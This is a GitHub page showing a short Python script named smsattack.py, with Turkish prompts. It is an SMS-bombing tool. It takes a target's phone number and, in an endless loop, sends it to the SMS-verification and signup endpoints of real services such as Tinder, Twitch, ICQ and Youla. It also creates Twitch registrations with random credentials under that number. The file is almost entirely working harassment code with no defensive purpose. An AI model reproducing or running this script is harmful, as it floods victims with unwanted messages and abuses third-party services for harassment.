-
Notifications
You must be signed in to change notification settings - Fork 6
/
smsattack.py
71 lines (65 loc) · 2.45 KB
/
smsattack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
import requests, random
from time import sleep
import urllib.request
import colorama
"""
---------------------------------------------------
Coder : W0RZ0NE
Version : 1.0
'Hayat İşte'
---------------------------------------------------
"""
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
_phone = input('Ülke Kodu İle Numara Girin:')
print("Örnek : +905511478850")
_name = ''
for x in range(12):
_name = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
password = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
username = _name + random.choice(list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM123456789'))
_phone9 = _phone[1:]
num = _phone
numplus = '+' + num
print(random.choice(colors))
while True:
#1
try:
print(requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":numplus}))
except:
print("Başarısız.")
#2
try:
print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', json= {"phone_number":numplus}))
except:
print("Başarısız.")
#3
try:
print(requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php/?msisdn={}&locale=en&countryCode=ru&k=ic1rtwz1s1Hj1O0r&version=1&r=46763'.format(num)))
except:
print("Başarısız.")
#4
try:
print(requests.post('https://account.my.games/signup_send_sms/', data={'phone': _phone}))
except:
print("Başarısız.")
#5
try:
print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, headers={}))
except:
print("Başarısız.")
#6
try:
print(requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': _phone}))
except:
print("Başarısız.")
#7
try:
print(requests.post('https://passport.twitch.tv/register?trusted_request=true',json={"birthday": {"day": 11, "month": 11, "year": 1999},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,"password": password, "phone_number": _phone,"username": username}))
except:
print("Başarısız.")
#8
try:
print(requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',data={'phone_number': _phone}))
except:
print("Başarısız.")
print(random.choice(colors))